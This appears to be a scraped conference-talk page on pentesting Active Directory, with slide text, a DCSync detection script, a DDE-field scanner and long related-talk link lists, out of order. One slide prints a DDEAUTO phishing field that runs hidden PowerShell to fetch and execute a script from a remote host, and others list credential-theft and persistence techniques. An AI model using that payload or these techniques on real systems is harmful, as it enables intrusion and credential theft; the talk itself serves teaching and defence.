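        subject = m["subject"].split("\\", 1)[-1]
        if subject in dc_accounts or subject in allowlist:
            continue  # genuine replication partner or known sync service
        suspects.append((m["ts"], subject, rights))
    return suspects


if __name__ == "__main__":
    for ts, who, rights in dcsync_suspects(LOG_4662, {"DC01$", "DC02$"}, {"MSOL_placeholder"}):
        print(ts, who, ", ".join(rights))
```

The allowlist is the weak point of this rule: an attacker who obtains the Azure AD Connect account gets legitimate-looking replication, so that account's exposure deserves the same review as the DCs themselves, and the list of principals holding these rights on the domain head should be audited rather than assumed.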
PENTESTING ACTIVE DIRECTORY
Wrapping Up
WRAPPING UP (diagram slides)
Getting credentials
• Plaintext creds: WDigest, SMB mining, mimikittenz, LaZagne, WCMDump
• Hashes: memory dump, …
Using credentials (a logon session carries an access token: user SID, group SIDs, logon SID, others …)
• Run as
• NTLM relay
• Pass-the-hash
• Pass-the-ticket
• Golden ticket
Remote code execution
• PsExec
• WinRM
• AT
• Schtasks
• WMIC
• SC
Further steps
• DCSync
• DCShadow
• Golden ticket
• SMB mining
Grabbing NTDS.dit
• Volume Shadow Copy
• Ntdsutil
• Invoke-NinjaCopy
• Extract the hashes with DSInternals or Impacket secretsdump, then crack them
Persistence
• Golden ticket
• Skeleton key
• ACL-based backdoors
• Malicious SSP
• Password filters
• …
BUSINESS RISK
Compromising just one Domain Admin account in Active Directory exposes the entire organization to risk: the attacker would have unrestricted access to every resource managed by the domain, all users, servers, workstations and data.
Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be remediated efficiently or with any guarantee.
"Once domain admin, always domain admin"
ACKNOWLEDGMENTS & REFERENCES
• Miroslav Sotak and the TVM team
• FWHIBBIT
• RootedCON and every other security community in Spain
PENTESTING ACTIVE DIRECTORY
Questions? Answers
ciyinet
carlos@ciyi.es
ciyinet@protonmail.com
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
RootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
RootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
RootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
RootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
RootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
RootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
RootedCON
 

More from RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Recently uploaded

Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 

Recently uploaded (20)

Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 

Carlos García - Pentesting Active Directory [rooted2018]

  • 2. WHOAMI
    Carlos García García
    - Computer Science Engineer
    - Penetration Testing and Red Teaming
    - OSCP Certified
    - Co-author of the book “Hacking Windows: Ataques a sistemas y redes Microsoft”
  • 3. WHAT ARE WE GOING TO TALK ABOUT?
    - Introduction to Active Directory
    - Authentication Protocols
    - Active Directory Penetration Testing
    - Reconnaissance
    - Common Attacks & Techniques
    - Lateral and Vertical Movements
    - How-to Avoid Being Caught
  • 4. BEAR IN MIND
    - AD-related techniques
    - I learn Active Directory from the offensive side
    - We lower risks and not the other way around
    - This is going to be intense
  • 5. ACTIVE DIRECTORY 101
  • 6. ACTIVE DIRECTORY 101
    • AD is Microsoft’s answer to directory services
    • A directory service is a hierarchical structure that stores objects for quick access and management of all resources
  • 7. ACTIVE DIRECTORY 101
    • Uses LDAP as its access protocol
    • Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries
    • AD supports several naming conventions
      • User Principal Names (UPN): user@domain
      • LDAP names (Distinguished Names):
        • cn=common name
        • ou=organizational unit
        • dc=domain
        • e.g. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
  • 9. ACTIVE DIRECTORY 101
    Just a Database: NTDS.dit
  • 10. ACTIVE DIRECTORY 101
    Domain Controllers and Domain Admins
  • 11. CREDENTIALS FLOW IN WINDOWS
  • 12. NTLM SCHEME
    Protocol | Algorithm | Secret to use
    LM       | DES-ECB   | LM hash
    NTLMv1   | DES-ECB   | NT hash
    NTLMv2   | HMAC-MD5  | NT hash
  • 13. KERBEROS SCHEME
    Protocol | Secret to use
    Kerberos | RC4 = NT hash
             | AES128 key
             | AES256 key
  • 14. KERBEROS SCHEME
    1. The client encrypts a timestamp with his/her hash/key
    2. The client receives a TGT signed with the domain krbtgt account that proves they are who they say they are
    3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain
    4. The DC sends a TGS ticket encrypted using the hash of the account associated with that service (SPN)
    Protocol | Secret to use
    Kerberos | RC4 = NT hash
             | AES128 key
             | AES256 key
  • 15. PENTESTING ACTIVE DIRECTORY
    Sure, but how about actually pentesting it?
  • 16. ACTIVE DIRECTORY PENETRATION TESTING
    The Goal
  • 17. ACTIVE DIRECTORY PENETRATION TESTING
    The Goal
    • Domain admins
    • Enterprise admins
    • Built-in administrators
    • Account Operators
    • Allowed RODC Password Replication Group
    • Backup Operators
    • DnsAdmins
    • …
  • 18. ACTIVE DIRECTORY PENETRATION TESTING
    The real Goal!
  • 19. ACTIVE DIRECTORY PENETRATION TESTING
    The real Goal! WMIC
  • 20. ATTACK KILL CHAIN
    Reference: Microsoft Advanced Threat Analytics
  • 21. ATTACK KILL CHAIN
  • 22. ATTACK KILL CHAIN
  • 27. PHISHING + DDEAUTO = RCE
    • Dynamic Data Exchange (DDE): protocol for transferring data between applications
    • Valid for MS Excel, MS Word… and MS Outlook
    • Recently used as macro-less malware
    Field code shown on the slide:
    DDEAUTO "C:ProgramsMicrosoftOffice365Outlook........windowssystem 32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire- test.ps1');powershell -e $e # " "Beneficios Qurtuba"
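Because the field code travels inside the document itself, a defender can find it before Office ever renders it: a .docx is a zip of XML parts, and a DDE field is a <w:instrText> (or <w:fldSimple>) instruction that starts with DDE or DDEAUTO. The scanner below is an added example, not code from the talk; it runs over constructed .docx samples, and the executable path in the sample field is a placeholder.

```python
"""Scan .docx parts for DDE/DDEAUTO field codes, the macro-less vector above."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def field_instructions(xml_bytes):
    """Yield every field code in one WordprocessingML part. Word usually splits a
    field code across several <w:instrText> runs, so the runs inside one paragraph
    are joined before matching; <w:fldSimple> carries its code in an attribute."""
    root = ET.fromstring(xml_bytes)
    for para in root.iter(W + "p"):
        runs = [t.text or "" for t in para.iter(W + "instrText")]
        if runs:
            yield "".join(runs).strip()
    for fld in root.iter(W + "fldSimple"):
        instr = fld.get(W + "instr")
        if instr:
            yield instr.strip()


def scan_docx(data):
    """Return [(part_name, field_code)] for each DDE field in the docx bytes.
    Headers, footers and footnotes live in their own parts, so every word/*.xml
    part is checked, not just document.xml."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for instr in field_instructions(z.read(name)):
                    if DDE_RE.search(instr):
                        findings.append((name, instr))
    return findings


def make_sample_docx(field_code):
    """Build a minimal constructed .docx (enough for the scanner, not a full Office
    package) holding one field, split over two runs the way Word stores it."""
    half = len(field_code) // 2
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    ) % (W_NS, escape(field_code[:half]), escape(field_code[half:]))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed samples: the executable path is a placeholder, not a real payload,
# and the second document carries an ordinary DATE field that must not match.
SAMPLE_DDE_DOCX = make_sample_docx('DDEAUTO C:\\PLACEHOLDER\\app.exe "demo"')
SAMPLE_CLEAN_DOCX = make_sample_docx('DATE \\@ "dd/MM/yyyy"')

if __name__ == "__main__":
    for label, blob in (("dde", SAMPLE_DDE_DOCX), ("clean", SAMPLE_CLEAN_DOCX)):
        print(label, scan_docx(blob))
```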
  • 29. NEXT STEPS
    • Persistence (userland)
    • Reconnaissance
    • Privilege escalation
      • PowerSploit PowerUp
      • Bypass UAC
      • …
    • Persistence (admin)
    • Lateral and vertical movements
    • Grab and exfiltrate trophies
  • 31. LOCAL RECONNAISSANCE
    Collect information about the network, processes and OS to find out what kind of machine we have succeeded in infecting.
    Command | Description
    ipconfig /all | Displays the IP address, subnet mask and default gateway for all adapters, plus the DHCP and DNS settings
    whoami /all | Displays all information in the current access token, including the current user name, security identifiers (SIDs), privileges and the groups the current user belongs to
    net localgroup | Displays the name of the server and the names of the local groups on the computer
    net localgroup “administrators” | Displays the local administrators
    netstat -an | Displays active TCP connections, the ports on which the computer is listening, Ethernet statistics and the IP routing table
    tasklist /V | Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer
